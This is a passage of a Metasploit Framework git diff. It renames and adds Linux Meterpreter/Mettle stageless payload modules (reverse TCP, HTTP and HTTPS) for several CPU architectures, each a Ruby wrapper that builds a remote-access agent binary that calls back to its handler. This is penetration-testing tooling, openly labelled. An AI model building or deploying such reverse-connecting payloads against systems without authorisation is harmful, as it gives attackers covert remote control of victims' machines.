Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 2e74746dab..e4d453a55c 100644 --- a/modules/payloads/singles/linux/mipsbe/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..cad8178fa2 --- /dev/null +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mipsle_linux' + +module MetasploitModule + + CachedSize = 997996 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..a2cbb51c1a --- /dev/null +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mipsle_linux' + +module MetasploitModule + + CachedSize = 997996 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 0a898abb51..d575313a72 100644 --- a/modules/payloads/singles/linux/mipsle/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..a95ea15d29 --- /dev/null +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppc_linux' + +module MetasploitModule + + CachedSize = 788788 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPC, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_ppc_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..5e5919de63 --- /dev/null +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppc_linux' + +module MetasploitModule + + CachedSize = 788788 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPC, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_ppc_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index ed7a18a30f..0a97807845 100644 --- a/modules/payloads/singles/linux/ppc/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('powerpc-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..9a14d00ad8 --- /dev/null +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppc64le_linux' + +module MetasploitModule + + CachedSize = 789888 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPC64LE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..97621306be --- /dev/null +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_ppc64le_linux' + +module MetasploitModule + + CachedSize = 789888 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_PPC64LE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_ppc64le_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index bd9c5a0de3..7d27e19744 100644 --- a/modules/payloads/singles/linux/ppc64le/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_PPC64LE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('powerpc64le-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..df1b072078 --- /dev/null +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_linux' + +module MetasploitModule + + CachedSize = 700032 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_x64_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..bfaac682d6 --- /dev/null +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_linux' + +module MetasploitModule + + CachedSize = 700032 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x64_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb similarity index 65% rename from modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index f8c5f7e734..58a8544949 100644 --- a/modules/payloads/singles/linux/x64/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -3,11 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_x64_mettle_linux' +require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule @@ -21,21 +20,23 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_X64, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_x64_Mettle_Linux + 'Session' => Msf::Sessions::Meterpreter_x64_Linux ) ) end def generate - MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..4e16a425c8 --- /dev/null +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x86_linux' + +module MetasploitModule + + CachedSize = 739644 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_x86_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..a8f346b575 --- /dev/null +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x86_linux' + +module MetasploitModule + + CachedSize = 739644 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x86_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb similarity index 65% rename from modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index a419ab029f..035a13fcb2 100644 --- a/modules/payloads/singles/linux/x86/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -3,11 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' -require 'msf/base/sessions/meterpreter_x86_mettle_linux' +require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule @@ -21,21 +20,23 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_x86_Mettle_Linux + 'Session' => Msf::Sessions::Meterpreter_x86_Linux ) ) end def generate - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..8f85d9d377 --- /dev/null +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_zarch_linux' + +module MetasploitModule + + CachedSize = 864336 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ZARCH, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_zarch_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..479cdb1b8d --- /dev/null +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_zarch_linux' + +module MetasploitModule + + CachedSize = 864336 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ZARCH, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_zarch_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 8c4bfc4b74..84e533fe8d 100644 --- a/modules/payloads/singles/linux/zarch/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_ZARCH, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/stages/linux/armle/mettle.rb b/modules/payloads/stages/linux/armle/meterpreter.rb similarity index 100% rename from modules/payloads/stages/linux/armle/mettle.rb rename to modules/payloads/stages/linux/armle/meterpreter.rb diff --git a/modules/payloads/stages/linux/mipsbe/mettle.rb b/modules/payloads/stages/linux/mipsbe/meterpreter.rb similarity index 100% rename from modules/payloads/stages/linux/mipsbe/mettle.rb rename to modules/payloads/stages/linux/mipsbe/meterpreter.rb diff --git a/modules/payloads/stages/linux/mipsle/mettle.rb b/modules/payloads/stages/linux/mipsle/meterpreter.rb similarity index 100% rename from modules/payloads/stages/linux/mipsle/mettle.rb rename to modules/payloads/stages/linux/mipsle/meterpreter.rb diff --git a/modules/payloads/stages/linux/x64/mettle.rb b/modules/payloads/stages/linux/x64/meterpreter.rb similarity index 95% rename from modules/payloads/stages/linux/x64/mettle.rb rename to modules/payloads/stages/linux/x64/meterpreter.rb index 3a0505ac11..38b5defb53 100644 --- a/modules/payloads/stages/linux/x64/mettle.rb +++ b/modules/payloads/stages/linux/x64/meterpreter.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/base/sessions/meterpreter_x64_mettle_linux' +require 'msf/base/sessions/meterpreter_x64_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' require 'rex/elfparsey' @@ -25,7 +25,7 @@ module MetasploitModule 'Platform' => 'Linux', 'Arch' => ARCH_X64, 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_x64_Mettle_Linux + 'Session' => Msf::Sessions::Meterpreter_x64_Linux ) ) end diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 982b475874..008c34eb5b 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -6,171 +6,93 @@ require 'msf/core' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' require 'rex/elfparsey' module MetasploitModule include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig def initialize(info = {}) - super(update_info(info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Inject the meterpreter server payload (staged)', - 'Author' => ['PKS', 'egypt', 'OJ Reeves'], - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_x86_Linux)) - - register_options([ - OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ]) - ], self.class) + super( + update_info( + info, + 'Name' => 'Linux Mettle x86', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'William Webb ' + ], + 'Platform' => 'Linux', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_x86_Linux + ) + ) end def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry end -=begin - def 